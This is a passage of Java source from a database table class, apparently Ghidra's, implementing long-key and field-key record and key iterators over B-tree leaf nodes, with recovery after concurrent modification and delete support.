public DBLongIterator longKeyIterator() throws IOException {
synchronized (db) {
if (!schema.useLongKeyNodes()) {
throw new AssertException();
}
return new LongKeyIterator();
}
}
/**
* Iterate over the long primary keys in ascending sorted order
* starting at the specified startKey.
* @param startKey the first primary key.
* @return long key iterator
* @throws IOException if an I/O error occurs.
*/
public DBLongIterator longKeyIterator(long startKey) throws IOException {
synchronized (db) {
if (!schema.useLongKeyNodes()) {
throw new AssertException();
}
return new LongKeyIterator(Long.MIN_VALUE, Long.MAX_VALUE, startKey);
}
}
/**
* Iterate over the long primary keys in ascending sorted order
* starting at the specified startKey.
* @param minKey the minimum primary key.
* @param maxKey the maximum primary key.
* @param startKey the initial iterator position.
* @return long key iterator
* @throws IOException if an I/O error occurs.
*/
public DBLongIterator longKeyIterator(long minKey, long maxKey, long startKey)
throws IOException {
synchronized (db) {
if (!schema.useLongKeyNodes()) {
throw new AssertException();
}
return new LongKeyIterator(minKey, maxKey, startKey);
}
}
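	// Usage sketch (illustrative): scan long primary keys and prune selected records using
	// the iterator's delete() of the last returned key. shouldRemove is a hypothetical predicate.
	//
	//   DBLongIterator keys = table.longKeyIterator(0, 1000, 0);
	//   while (keys.hasNext()) {
	//       long k = keys.next();
	//       if (shouldRemove(k)) {
	//           keys.delete();   // deletes the record whose key was just returned
	//       }
	//   }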
/**
* Iterate over all primary keys in ascending sorted order.
* @return Field type key iterator
* @throws IOException if an I/O error occurs.
*/
public DBFieldIterator fieldKeyIterator() throws IOException {
synchronized (db) {
if (schema.useLongKeyNodes()) {
throw new AssertException();
}
return new FieldKeyIterator(null, null, null);
}
}
/**
* Iterate over the primary keys in ascending sorted order
* starting at the specified startKey.
* @param startKey the first primary key. If null the minimum key value will be assumed.
* @return Field type key iterator
* @throws IOException if an I/O error occurs.
*/
public DBFieldIterator fieldKeyIterator(Field startKey) throws IOException {
synchronized (db) {
if (schema.useLongKeyNodes()) {
throw new AssertException();
}
return new FieldKeyIterator(null, null, startKey);
}
}
/**
* Iterate over the records in ascending sorted order
* starting at the specified startKey.
* @param minKey minimum key value. Null corresponds to minimum key value.
* @param maxKey maximum key value. Null corresponds to maximum key value.
* @param startKey the initial iterator position. If null minKey will be assumed,
* if still null the minimum key value will be assumed.
* @return Field type key iterator
* @throws IOException if an I/O error occurs.
*/
public DBFieldIterator fieldKeyIterator(Field minKey, Field maxKey, Field startKey)
throws IOException {
synchronized (db) {
if (schema.useLongKeyNodes()) {
throw new AssertException();
}
return new FieldKeyIterator(minKey, maxKey, startKey);
}
}
/**
* Iterate over the records in ascending sorted order
* starting at the specified startKey.
* @param minKey minimum key value. Null corresponds to minimum key value.
* @param maxKey maximum key value. Null corresponds to maximum key value.
* @param before if true initial position is before minKey, else position
* is after maxKey.
* @return Field type key iterator
* @throws IOException if an I/O error occurs.
*/
public DBFieldIterator fieldKeyIterator(Field minKey, Field maxKey, boolean before)
throws IOException {
synchronized (db) {
if (schema.useLongKeyNodes()) {
throw new AssertException();
}
return new FieldKeyIterator(minKey, maxKey, before);
}
}
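	// Usage sketch (illustrative): descending traversal of Field primary keys by positioning
	// the iterator after the maximum key and stepping backwards with previous().
	//
	//   DBFieldIterator keys = table.fieldKeyIterator(null, null, false /* after maxKey */);
	//   while (keys.hasPrevious()) {
	//       Field k = keys.previous();   // keys returned in descending order
	//   }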
/**
	 * A RecordIterator class for use with table data contained within LeafNodes.
*/
private class LongKeyRecordIterator implements RecordIterator {
private int bufferId = -1; // current record buffer ID
private int recordIndex; // current record index
private boolean isNext; // recover position is next record
private boolean isPrev; // recover position is previous record
private DBRecord record; // current record
private long curKey; // copy of record key (record may get changed by consumer)
private DBRecord lastRecord;
private boolean hasPrev; // current record is previous
private boolean hasNext; // current record is next
private long minKey;
private long maxKey;
private int expectedModCount;
/**
* Construct a record iterator over all records. (requires DBHandle lock)
* @throws IOException thrown if IO error occurs
*/
private LongKeyRecordIterator() throws IOException {
this(Long.MIN_VALUE, Long.MAX_VALUE, Long.MIN_VALUE);
hasPrev = false;
}
/**
* Construct a record iterator. (requires DBHandle lock)
* @param minKey minimum allowed primary key.
* @param maxKey maximum allowed primary key.
* @param startKey the first primary key value.
* @throws IOException thrown if IO error occurs
*/
private LongKeyRecordIterator(long minKey, long maxKey, long startKey) throws IOException {
expectedModCount = modCount;
this.minKey = minKey;
this.maxKey = maxKey;
if (rootBufferId < 0) {
return;
}
if (minKey > maxKey) {
return;
}
try {
LongKeyNode rootNode = nodeMgr.getLongKeyNode(rootBufferId);
LongKeyRecordNode leaf = rootNode.getLeafNode(startKey);
recordIndex = leaf.getKeyIndex(startKey);
// Start key was found
if (recordIndex >= 0) {
hasPrev = true;
hasNext = true;
}
// Start key was not found
else {
recordIndex = -(recordIndex + 1);
if (recordIndex == leaf.keyCount) {
--recordIndex;
hasPrev = leaf.getKey(recordIndex) >= minKey;
if (!hasPrev) {
leaf = leaf.getNextLeaf();
if (leaf == null) {
return;
}
recordIndex = 0;
hasNext = leaf.getKey(recordIndex) <= maxKey;
}
}
else {
hasNext = leaf.getKey(recordIndex) <= maxKey;
if (!hasNext) {
// position to previous record
if (recordIndex == 0) {
leaf = leaf.getPreviousLeaf();
if (leaf == null) {
return;
}
recordIndex = leaf.keyCount - 1;
}
else {
--recordIndex;
}
hasPrev = leaf.getKey(recordIndex) >= minKey;
}
}
}
if (hasPrev || hasNext) {
bufferId = leaf.getBufferId();
record = leaf.getRecord(schema, recordIndex);
curKey = record.getKey();
}
}
finally {
nodeMgr.releaseNodes();
}
}
/**
* Get the current record leaf. If the current record can not be found, attempt to
* recover the record position.
* @param recoverPrev if true and the current record no longer exists,
* the current position will be set to the previous record and isPrev set to true;
* else if false and the current record no longer exists, the current position
* will be set to the next record and isNext set to true.
* @return LongKeyRecordNode the leaf node containing the current record position
* identified by bufferId and recordIndex. If null, the current record was not found
* or the position could not be set to a next/previous record position based upon the
* recoverPrev value specified.
* @throws IOException thrown if IO error occurs
*/
private LongKeyRecordNode getRecordLeaf(boolean recoverPrev) throws IOException {
if (rootBufferId < 0 || record == null) {
return null;
}
LongKeyRecordNode leaf = null;
isNext = false;
isPrev = false;
if (expectedModCount == modCount) {
leaf = (LongKeyRecordNode) nodeMgr.getLongKeyNode(bufferId);
if (recordIndex >= leaf.keyCount || leaf.getKey(recordIndex) != curKey) {
leaf = null; // something changed - key search required
}
}
if (leaf == null) {
// Something changed - try to relocate record using key
LongKeyNode rootNode = nodeMgr.getLongKeyNode(rootBufferId);
leaf = rootNode.getLeafNode(curKey);
int index = leaf.getKeyIndex(curKey);
if (index < 0) {
// Record was deleted - position on next key
index = -index - 1;
if (recoverPrev) {
--index;
if (index < 0) {
leaf = leaf.getPreviousLeaf();
index = leaf != null ? (leaf.keyCount - 1) : 0;
}
isPrev = true;
}
else {
if (index == leaf.keyCount) {
leaf = leaf.getNextLeaf();
index = 0;
}
isNext = true;
}
}
if (leaf != null) {
bufferId = leaf.getBufferId();
recordIndex = index;
}
expectedModCount = modCount;
}
return leaf;
}
@Override
public boolean hasNext() throws IOException {
synchronized (db) {
if (!hasNext && nodeMgr != null) {
try {
// Check for modification to storage of previous record
LongKeyRecordNode leaf = getRecordLeaf(false);
if (leaf == null) {
return false;
}
// Position to next record
int nextIndex = recordIndex;
if (!isNext) {
++nextIndex;
}
int nextBufferId = bufferId;
if (nextIndex == leaf.keyCount) {
leaf = leaf.getNextLeaf();
if (leaf == null) {
return false;
}
nextBufferId = leaf.getBufferId();
nextIndex = 0;
}
// Load next record
DBRecord nextRecord = leaf.getRecord(schema, nextIndex);
hasNext = nextRecord.getKey() <= maxKey;
if (hasNext) {
bufferId = nextBufferId;
recordIndex = nextIndex;
record = nextRecord;
curKey = record.getKey();
hasPrev = false;
}
}
finally {
nodeMgr.releaseNodes();
}
}
return hasNext;
}
}
@Override
public boolean hasPrevious() throws IOException {
synchronized (db) {
if (!hasPrev && nodeMgr != null) {
try {
// Check for modification to storage of next record
LongKeyRecordNode leaf = getRecordLeaf(true);
if (leaf == null) {
return false;
}
// Position to previous record
int prevIndex = recordIndex;
if (!isPrev) {
--prevIndex;
}
int prevBufferId = bufferId;
if (prevIndex < 0) {
leaf = leaf.getPreviousLeaf();
if (leaf == null) {
return false;
}
prevBufferId = leaf.getBufferId();
prevIndex = leaf.keyCount - 1;
}
// Load previous record
DBRecord prevRecord = leaf.getRecord(schema, prevIndex);
hasPrev = prevRecord.getKey() >= minKey;
if (hasPrev) {
bufferId = prevBufferId;
recordIndex = prevIndex;
record = prevRecord;
curKey = record.getKey();
hasNext = false;
}
}
finally {
nodeMgr.releaseNodes();
}
}
return hasPrev;
}
}
@Override
public DBRecord next() throws IOException {
if (hasNext || hasNext()) {
hasNext = false;
hasPrev = true;
lastRecord = record;
return record;
}
return null;
}
@Override
public DBRecord previous() throws IOException {
if (hasPrev || hasPrevious()) {
hasNext = true;
hasPrev = false;
lastRecord = record;
return record;
}
return null;
}
@Override
public boolean delete() throws IOException {
if (lastRecord == null) {
return false;
}
deleteRecord(lastRecord.getKey());
lastRecord = null;
return true;
}
}
/**
	 * A RecordIterator class for use with table data contained within LeafNodes.
*/
private class FieldKeyRecordIterator implements RecordIterator {
private int bufferId = -1; // current record buffer ID
private int recordIndex; // current record index
private boolean isNext; // recover position is next record
private boolean isPrev; // recover position is previous record
private DBRecord record; // current record
// private Field curKey; // copy of record key (record may get changed by consumer)
private DBRecord lastRecord;
private boolean hasPrev; // current record is previous
private boolean hasNext; // current record is next
private Field minKey;
private Field maxKey;
private int expectedModCount;
/**
* Construct a record iterator.
* @param minKey minimum allowed primary key.
* @param maxKey maximum allowed primary key.
* @param startKey the first primary key value. If null, minKey will be used.
* @throws IOException thrown if IO error occurs
*/
FieldKeyRecordIterator(Field minKey, Field maxKey, Field startKey) throws IOException {
expectedModCount = modCount;
this.minKey = minKey;
this.maxKey = maxKey;
if (rootBufferId < 0) {
return;
}
if (minKey != null && maxKey != null && minKey.compareTo(maxKey) > 0) {
return;
}
if (startKey != null) {
// if (minKey != null && startKey.compareTo(minKey) < 0)
// return;
// if (maxKey != null && startKey.compareTo(maxKey) > 0)
// return;
}
else {
startKey = minKey;
}
try {
FieldKeyNode rootNode = getFieldKeyNode(rootBufferId);
// If startKey not specified, start with leftmost record
if (startKey == null) {
FieldKeyRecordNode leaf = rootNode.getLeftmostLeafNode();
bufferId = leaf.getBufferId();
recordIndex = 0;
record = leaf.getRecord(schema, 0);
// curKey = record.getKeyField();
hasNext = true;
}
// else, start with specified startKey
else {
FieldKeyRecordNode leaf = rootNode.getLeafNode(startKey);
recordIndex = leaf.getKeyIndex(startKey);
// Start key was found
if (recordIndex >= 0) {
hasPrev = true;
hasNext = true;
}
// Start key was not found
else {
recordIndex = -(recordIndex + 1);
if (recordIndex == leaf.getKeyCount()) {
--recordIndex;
hasPrev = minKey == null ? true
: (leaf.getKeyField(recordIndex).compareTo(minKey) >= 0);
if (!hasPrev) {
leaf = leaf.getNextLeaf();
if (leaf == null) {
return;
}
recordIndex = 0;
hasNext = maxKey == null ? true
: (leaf.getKeyField(recordIndex).compareTo(maxKey) <= 0);
}
}
else {
hasNext = maxKey == null ? true
: (leaf.getKeyField(recordIndex).compareTo(maxKey) <= 0);
if (!hasNext) {
// position to previous record
if (recordIndex == 0) {
leaf = leaf.getPreviousLeaf();
if (leaf == null) {
return;
}
recordIndex = leaf.getKeyCount() - 1;
}
else {
--recordIndex;
}
hasPrev = minKey == null ? true
: (leaf.getKeyField(recordIndex).compareTo(minKey) >= 0);
}
}
}
if (hasPrev || hasNext) {
bufferId = leaf.getBufferId();
record = leaf.getRecord(schema, recordIndex);
// curKey = record.getKeyField();
}
}
}
finally {
nodeMgr.releaseNodes();
}
}
/**
* Get the current record leaf. If the current record can not be found, attempt to
* recover the record position.
* @param recoverPrev if true and the current record no longer exists,
* the current position will be set to the previous record and isPrev set to true;
* else if false and the current record no longer exists, the current position
* will be set to the next record and isNext set to true.
* @return FieldKeyRecordNode the leaf node containing the current record position
* identified by bufferId and recordIndex. If null, the current record was not found
* or the position could not be set to a next/previous record position based upon the
* recoverPrev value specified.
* @throws IOException thrown if IO error occurs
*/
private FieldKeyRecordNode getRecordLeaf(boolean recoverPrev) throws IOException {
if (rootBufferId < 0 || record == null) {
return null;
}
Field key = record.getKeyField();
FieldKeyRecordNode leaf = null;
isNext = false;
isPrev = false;
if (expectedModCount == modCount) {
leaf = (FieldKeyRecordNode) getFieldKeyNode(bufferId);
if (recordIndex >= leaf.getKeyCount() ||
!leaf.getKeyField(recordIndex).equals(key)) {
leaf = null; // something changed - key search required
}
}
if (leaf == null) {
// Something changed - try to relocate record using key
FieldKeyNode rootNode = getFieldKeyNode(rootBufferId);
leaf = rootNode.getLeafNode(key);
int index = leaf.getKeyIndex(key);
if (index < 0) {
// Record was deleted - position on next key
index = -index - 1;
if (recoverPrev) {
--index;
if (index < 0) {
leaf = leaf.getPreviousLeaf();
index = leaf != null ? (leaf.getKeyCount() - 1) : 0;
}
isPrev = true;
}
else {
if (index == leaf.getKeyCount()) {
leaf = leaf.getNextLeaf();
index = 0;
}
isNext = true;
}
}
if (leaf != null) {
bufferId = leaf.getBufferId();
recordIndex = index;
}
expectedModCount = modCount;
}
return leaf;
}
@Override
public boolean hasNext() throws IOException {
synchronized (db) {
if (!hasNext && nodeMgr != null) {
try {
// Check for modification to storage of previous record
FieldKeyRecordNode leaf = getRecordLeaf(false);
if (leaf == null) {
return false;
}
// Position to next record
int nextIndex = recordIndex;
if (!isNext) {
++nextIndex;
}
int nextBufferId = bufferId;
if (nextIndex == leaf.getKeyCount()) {
leaf = leaf.getNextLeaf();
if (leaf == null) {
return false;
}
nextBufferId = leaf.getBufferId();
nextIndex = 0;
}
// Load next record
DBRecord nextRecord = leaf.getRecord(schema, nextIndex);
hasNext = maxKey == null ? true
: (nextRecord.getKeyField().compareTo(maxKey) <= 0);
if (hasNext) {
bufferId = nextBufferId;
recordIndex = nextIndex;
record = nextRecord;
// curKey = record.getKeyField();
hasPrev = false;
}
}
finally {
nodeMgr.releaseNodes();
}
}
return hasNext;
}
}
@Override
public boolean hasPrevious() throws IOException {
synchronized (db) {
if (!hasPrev && nodeMgr != null) {
try {
// Check for modification to storage of next record
FieldKeyRecordNode leaf = getRecordLeaf(true);
if (leaf == null) {
return false;
}
// Position to previous record
int prevIndex = recordIndex;
if (!isPrev) {
--prevIndex;
}
int prevBufferId = bufferId;
if (prevIndex < 0) {
leaf = leaf.getPreviousLeaf();
if (leaf == null) {
return false;
}
prevBufferId = leaf.getBufferId();
prevIndex = leaf.getKeyCount() - 1;
}
// Load previous record
DBRecord prevRecord = leaf.getRecord(schema, prevIndex);
hasPrev = minKey == null ? true
: (prevRecord.getKeyField().compareTo(minKey) >= 0);
if (hasPrev) {
bufferId = prevBufferId;
recordIndex = prevIndex;
record = prevRecord;
// curKey = record.getKeyField();
hasNext = false;
}
}
finally {
nodeMgr.releaseNodes();
}
}
return hasPrev;
}
}
@Override
public DBRecord next() throws IOException {
if (hasNext || hasNext()) {
hasNext = false;
hasPrev = true;
lastRecord = record;
return record;
}
return null;
}
@Override
public DBRecord previous() throws IOException {
if (hasPrev || hasPrevious()) {
hasNext = true;
hasPrev = false;
lastRecord = record;
return record;
}
return null;
}
@Override
public boolean delete() throws IOException {
if (lastRecord == null) {
return false;
}
deleteRecord(lastRecord.getKeyField());
lastRecord = null;
return true;
}
}
/**
* A long key iterator class.
*/
private class LongKeyIterator implements DBLongIterator {
private static final int SHORT_ITER_THRESHOLD = 10;
private DBLongIterator keyIter;
private int iterCnt = 0;
/**
* Construct a record iterator over all records.
* Long-running iterator used (all keys in buffer read at once)
* @throws IOException thrown if IO error occurs
*/
LongKeyIterator() throws IOException {
keyIter = new LongDurationLongKeyIterator(); // optimized for long iterations
			iterCnt = Integer.MAX_VALUE; // disable short-to-long iterator change-over logic
}
/**
* Construct a record iterator. The underlying iterator is optimized for
		 * short iterations. If it is determined that the iterator will be used
* for a large number of iterations, the underlying iterator is switched
* to one optimized for longer iterations.
* @param minKey minimum allowed primary key.
* @param maxKey maximum allowed primary key.
* @param startKey the first primary key value.
* @throws IOException thrown if IO error occurs
*/
LongKeyIterator(long minKey, long maxKey, long startKey) throws IOException {
keyIter = new ShortDurationLongKeyIterator(minKey, maxKey, startKey);
}
@Override
public boolean hasNext() throws IOException {
synchronized (db) {
if (iterCnt <= SHORT_ITER_THRESHOLD && ++iterCnt > SHORT_ITER_THRESHOLD) {
// Switch to long-running iterator
keyIter =
new LongDurationLongKeyIterator((ShortDurationLongKeyIterator) keyIter);
}
return keyIter.hasNext();
}
}
@Override
public boolean hasPrevious() throws IOException {
synchronized (db) {
if (iterCnt <= SHORT_ITER_THRESHOLD && ++iterCnt > SHORT_ITER_THRESHOLD) {
// Switch to long-running iterator
keyIter =
new LongDurationLongKeyIterator((ShortDurationLongKeyIterator) keyIter);
}
return keyIter.hasPrevious();
}
}
@Override
public long next() throws IOException {
return keyIter.next();
}
@Override
public long previous() throws IOException {
return keyIter.previous();
}
@Override
public boolean delete() throws IOException {
return keyIter.delete();
}
}
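	// Note on the wrapper above: when constructed with a key range, the first
	// SHORT_ITER_THRESHOLD hasNext()/hasPrevious() calls are served by
	// ShortDurationLongKeyIterator, which re-reads keys from the node buffer on demand;
	// once the threshold is crossed, iteration state is handed off to
	// LongDurationLongKeyIterator, which caches the full key array of the current leaf
	// to avoid repeated buffer access during long scans.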
/**
* A long key iterator class - optimized for long iterations since
* all keys are read for each record node.
*/
private class LongDurationLongKeyIterator implements DBLongIterator {
private int bufferId;
private int keyIndex;
private long[] keys;
private long key;
private long lastKey;
private boolean hasLastKey;
private int expectedModCount;
private boolean hasPrev;
private boolean hasNext;
private long minKey;
private long maxKey;
/**
* Construct a record iterator over all records.
* @throws IOException thrown if IO error occurs
*/
LongDurationLongKeyIterator() throws IOException {
this(Long.MIN_VALUE, Long.MAX_VALUE, Long.MIN_VALUE);
hasPrev = false;
}
/**
* Iterator hand-off constructor. Transition from short-running to
* long-running iterator.
* @param keyIter partially used short-running iterator
* @throws IOException if IO error occurs
*/
LongDurationLongKeyIterator(ShortDurationLongKeyIterator keyIter) throws IOException {
this.bufferId = keyIter.bufferId;
this.keyIndex = keyIter.keyIndex;
this.key = keyIter.key;
this.lastKey = keyIter.lastKey;
this.hasLastKey = keyIter.hasLastKey;
this.expectedModCount = keyIter.expectedModCount;
this.hasPrev = keyIter.hasPrev;
this.hasNext = keyIter.hasNext;
this.minKey = keyIter.minKey;
this.maxKey = keyIter.maxKey;
if (bufferId >= 0) {
if (modCount != expectedModCount) {
reset();
}
else {
try {
LongKeyRecordNode leaf =
(LongKeyRecordNode) nodeMgr.getLongKeyNode(bufferId);
getKeys(leaf);
}
finally {
nodeMgr.releaseNodes();
}
}
}
else {
keys = new long[0];
}
}
/**
* Construct a record iterator.
* @param minKey minimum allowed primary key.
* @param maxKey maximum allowed primary key.
* @param startKey the first primary key value.
* @throws IOException thrown if IO error occurs
*/
LongDurationLongKeyIterator(long minKey, long maxKey, long startKey) throws IOException {
// if (startKey < minKey || startKey > maxKey || minKey > maxKey)
// throw new IllegalArgumentException();
this.minKey = minKey;
this.maxKey = maxKey;
this.key = startKey;
initialize(startKey);
}
/**
* Initialize (or re-initialize) iterator state.
* An empty or null keys array will force a complete initialization.
		 * Otherwise, following a delete, the keys array and keyIndex should reflect the
		 * post-delete state.
* @param targetKey the initial key. For construction this is the startKey,
* following a delete this is the deleted key.
* @throws IOException thrown if IO error occurs
*/
private void initialize(long targetKey) throws IOException {
expectedModCount = modCount;
hasPrev = false;
hasNext = false;
if (rootBufferId < 0) {
bufferId = -1;
keys = new long[0];
return;
}
try {
LongKeyRecordNode leaf = null;
if (keys == null || keys.length == 0) {
LongKeyNode rootNode = nodeMgr.getLongKeyNode(rootBufferId);
leaf = rootNode.getLeafNode(targetKey);
// Empty leaf node - special case
int leafRecCount = leaf.keyCount;
if (leafRecCount == 0) {
return;
}
keyIndex = leaf.getKeyIndex(targetKey);
getKeys(leaf);
}
// Start key was found
if (keyIndex >= 0) {
key = targetKey;
hasPrev = true;
hasNext = true;
}
// Start key was not found
else {
keyIndex = -(keyIndex + 1);
if (keyIndex == keys.length) {
--keyIndex;
hasPrev = keys[keyIndex] >= minKey;
if (!hasPrev) {
if (leaf == null) {
keys = null;
initialize(targetKey);
return;
}
leaf = leaf.getNextLeaf();
if (leaf == null) {
keys = new long[0];
bufferId = -1;
return;
}
keyIndex = 0;
getKeys(leaf);
hasNext = keys[keyIndex] <= maxKey;
}
}
else {
hasNext = keys[keyIndex] <= maxKey;
if (!hasNext) {
// position to previous record
if (keyIndex == 0) {
if (leaf == null) {
keys = null;
initialize(targetKey);
return;
}
leaf = leaf.getPreviousLeaf();
if (leaf == null) {
keys = new long[0];
bufferId = -1;
return;
}
keyIndex = leaf.keyCount - 1;
getKeys(leaf);
}
else {
--keyIndex;
}
hasPrev = keys[keyIndex] >= minKey;
}
}
if (hasNext || hasPrev) {
key = keys[keyIndex];
}
}
}
finally {
nodeMgr.releaseNodes();
}
}
private void reset() throws IOException {
boolean hadNext = hasNext;
boolean hadPrev = hasPrev;
keys = null;
initialize(key);
if (hasNext && hasPrev) {
hasNext = hadNext;
hasPrev = hadPrev;
}
}
private void getKeys(LongKeyRecordNode node) {
bufferId = node.getBufferId();
if (keys == null || keys.length != node.keyCount) {
keys = new long[node.keyCount];
}
for (int i = 0; i < node.keyCount; i++) {
keys[i] = node.getKey(i);
}
}
@Override
public boolean hasNext() throws IOException {
synchronized (db) {
if (modCount != expectedModCount) {
reset();
}
if (!hasNext) {
// Check next key index
int nextIndex = keyIndex + 1;
// Process next leaf if needed
if (nextIndex >= keys.length) {
try {
if (bufferId == -1) {
return false;
}
LongKeyRecordNode leaf = ((LongKeyRecordNode) nodeMgr.getLongKeyNode(
bufferId)).getNextLeaf();
if (leaf == null || leaf.getKey(0) > maxKey) {
return false;
}
getKeys(leaf);
key = keys[0];
keyIndex = 0;
hasNext = true;
hasPrev = false;
}
finally {
nodeMgr.releaseNodes();
}
}
// else, use keys cache
else {
hasNext = keys[nextIndex] <= maxKey;
if (hasNext) {
key = keys[nextIndex];
keyIndex = nextIndex;
hasPrev = false;
}
}
}
return hasNext;
}
}
@Override
public boolean hasPrevious() throws IOException {
synchronized (db) {
if (modCount != expectedModCount) {
reset();
}
if (!hasPrev) {
// Check previous key index
int prevIndex = keyIndex - 1;
// Process previous leaf if needed
if (prevIndex < 0 || keys.length == 0) {
try {
if (bufferId == -1) {
return false;
}
LongKeyRecordNode leaf = ((LongKeyRecordNode) nodeMgr.getLongKeyNode(
bufferId)).getPreviousLeaf();
if (leaf == null) {
return false;
}
prevIndex = leaf.keyCount - 1;
if (leaf.getKey(prevIndex) < minKey) {
return false;
}
getKeys(leaf);
key = keys[prevIndex];
keyIndex = prevIndex;
hasNext = false;
hasPrev = true;
}
finally {
nodeMgr.releaseNodes();
}
}
// else, use keys cache
else {
hasPrev = keys[prevIndex] >= minKey;
if (hasPrev) {
key = keys[prevIndex];
keyIndex = prevIndex;
hasNext = false;
}
}
}
return hasPrev;
}
}
@Override
public long next() throws IOException {
if (hasNext || hasNext()) {
hasNext = false;
hasPrev = true;
lastKey = key;
hasLastKey = true;
return key;
}
throw new NoSuchElementException();
}
@Override
public long previous() throws IOException {
if (hasPrev || hasPrevious()) {
hasNext = true;
hasPrev = false;
lastKey = key;
hasLastKey = true;
return key;
}
throw new NoSuchElementException();
}
@Override
public boolean delete() throws IOException {
if (hasLastKey) {
synchronized (db) {
long deleteKey = lastKey;
hasLastKey = false;
boolean success = deleteRecord(deleteKey);
int newLen = keys.length - 1;
if (deleteKey == key && keys.length > 1 /* && keyIndex < newLen */) {
long[] newKeys = new long[newLen];
System.arraycopy(keys, 0, newKeys, 0, keyIndex);
System.arraycopy(keys, keyIndex + 1, newKeys, keyIndex, newLen - keyIndex);
keys = newKeys;
						keyIndex = -(keyIndex + 1); // negative index signals initialize() that the key no longer exists
}
else {
keys = null;
}
initialize(deleteKey);
return success;
}
}
return false;
}
}
/**
* A long key iterator class - optimized for short iterations since
* the number of keys read from each record node is minimized.
*/
private class ShortDurationLongKeyIterator implements DBLongIterator {
private int bufferId;
private int keyIndex;
private long key;
private long lastKey;
private boolean hasLastKey = false;
private int expectedModCount;
private boolean hasPrev;
private boolean hasNext;
private long minKey;
private long maxKey;
/**
* Construct a record iterator.
* @param minKey minimum allowed primary key.
* @param maxKey maximum allowed primary key.
* @param startKey the first primary key value.
* @throws IOException thrown if IO error occurs
*/
ShortDurationLongKeyIterator(long minKey, long maxKey, long startKey) throws IOException {
this.minKey = minKey;
this.maxKey = maxKey;
this.key = startKey;
initialize(startKey);
}
/**
* Initialize (or re-initialize) iterator state.
		 * Unlike the long-duration iterator, no key cache is maintained; the iterator is
		 * simply re-positioned relative to the specified target key.
* @param targetKey the initial key. For construction this is the startKey,
* following a delete this is the deleted key.
* @throws IOException thrown if IO error occurs
*/
private void initialize(long targetKey) throws IOException {
expectedModCount = modCount;
hasPrev = false;
hasNext = false;
bufferId = -1;
if (rootBufferId < 0) {
return;
}
try {
LongKeyRecordNode leaf = null;
LongKeyNode rootNode = nodeMgr.getLongKeyNode(rootBufferId);
leaf = rootNode.getLeafNode(targetKey);
bufferId = leaf.getBufferId();
// Empty leaf node - special case
if (leaf.keyCount == 0) {
keyIndex = -1;
return;
}
keyIndex = leaf.getKeyIndex(targetKey);
// Start key was found
if (keyIndex >= 0) {
key = leaf.getKey(keyIndex);
hasPrev = true;
hasNext = true;
}
// Start key was not found
else {
keyIndex = -(keyIndex + 1);
if (keyIndex == leaf.keyCount) {
--keyIndex;
key = leaf.getKey(keyIndex);
hasPrev = key >= minKey;
}
else {
key = leaf.getKey(keyIndex);
hasNext = key <= maxKey;
}
}
}
finally {
nodeMgr.releaseNodes();
}
}
private void reset() throws IOException {
boolean hadNext = hasNext;
boolean hadPrev = hasPrev;
initialize(key);
if (hasNext && hasPrev) {
hasNext = hadNext;
hasPrev = hadPrev;
}
}
@Override
public boolean hasNext() throws IOException {
synchronized (db) {
if (modCount != expectedModCount) {
reset();
}
if (!hasNext) {
if (bufferId < 0 || keyIndex < 0) {
return false;
}
// Check next key index
int nextIndex = keyIndex + 1;
try {
// Process next leaf if needed
LongKeyRecordNode leaf =
(LongKeyRecordNode) nodeMgr.getLongKeyNode(bufferId);
if (nextIndex >= leaf.keyCount) {
leaf = leaf.getNextLeaf();
if (leaf == null) {
return false;
}
long nextKey = leaf.getKey(0);
if (nextKey > maxKey) {
return false;
}
bufferId = leaf.getBufferId();
key = nextKey;
keyIndex = 0;
hasNext = true;
hasPrev = false;
}
// else, use keys cache
else {
long nextKey = leaf.getKey(nextIndex);
hasNext = (nextKey <= maxKey);
if (hasNext) {
key = nextKey;
keyIndex = nextIndex;
hasPrev = false;
}
}
}
finally {
nodeMgr.releaseNodes();
}
}
return hasNext;
}
}
@Override
public boolean hasPrevious() throws IOException {
synchronized (db) {
if (modCount != expectedModCount) {
reset();
}
if (!hasPrev) {
if (bufferId < 0 || keyIndex < 0) {
return false;
}
// Check previous key index
int prevIndex = keyIndex - 1;
try {
// Process previous leaf if needed
LongKeyRecordNode leaf =
(LongKeyRecordNode) nodeMgr.getLongKeyNode(bufferId);
if (prevIndex < 0) {
leaf = leaf.getPreviousLeaf();
if (leaf == null) {
return false;
}
prevIndex = leaf.keyCount - 1;
long prevKey = leaf.getKey(prevIndex);
if (prevKey < minKey) {
return false;
}
bufferId = leaf.getBufferId();
key = prevKey;
keyIndex = prevIndex;
hasNext = false;
hasPrev = true;
}
// else, use keys cache
else {
long prevKey = leaf.getKey(prevIndex);
hasPrev = prevKey >= minKey;
if (hasPrev) {
key = prevKey;
keyIndex = prevIndex;
hasNext = false;
}
}
}
finally {
nodeMgr.releaseNodes();
}
}
return hasPrev;
}
}
@Override
public long next() throws IOException {
if (hasNext || hasNext()) {
hasNext = false;
hasPrev = true;
lastKey = key;
hasLastKey = true;
return key;
}
throw new NoSuchElementException();
}
@Override
public long previous() throws IOException {
if (hasPrev || hasPrevious()) {
hasNext = true;
hasPrev = false;
lastKey = key;
hasLastKey = true;
return key;
}
throw new NoSuchElementException();
}
@Override
public boolean delete() throws IOException {
if (hasLastKey) {
hasLastKey = false;
return deleteRecord(lastKey);
}
return false;
}
}
/**
* A Field key iterator class. The initial iterator is optimized for
	 * short iterations. If it is determined that the iterator will be used
* for a large number of iterations, the underlying iterator is switched
* to one optimized for longer iterations.
*/
private class FieldKeyIterator implements DBFieldIterator {
private static final int SHORT_ITER_THRESHOLD = 10;
private DBFieldIterator keyIter;
private int iterCnt = 0;
/**
* Construct a record iterator. (requires DBHandle lock)
* @param minKey minimum key value. Null corresponds to minimum key value.
* @param maxKey maximum key value. Null corresponds to maximum key value.
* @param startKey the first primary key value. If null minKey will be assumed,
		 * if still null the minimum key value will be assumed.
* @throws IOException thrown if IO error occurs
*/
FieldKeyIterator(Field minKey, Field maxKey, Field startKey) throws IOException {
keyIter = new ShortDurationFieldKeyIterator(minKey, maxKey, startKey);
}
/**
* Construct a record iterator. (requires DBHandle lock)
* @param minKey minimum key value. Null corresponds to minimum key value.
* @param maxKey maximum key value. Null corresponds to maximum key value.
* @param before true if initial position is before range, else after range
* @throws IOException thrown if IO error occurs
*/
FieldKeyIterator(Field minKey, Field maxKey, boolean before) throws IOException {
Field startKey = before ? minKey : maxKey;
if (startKey == null && !before && rootBufferId != -1) {
try {
FieldKeyNode rightmostLeaf =
getFieldKeyNode(rootBufferId).getRightmostLeafNode();
startKey = rightmostLeaf.getKeyField(rightmostLeaf.getKeyCount() - 1);
}
finally {
nodeMgr.releaseNodes();
}
}
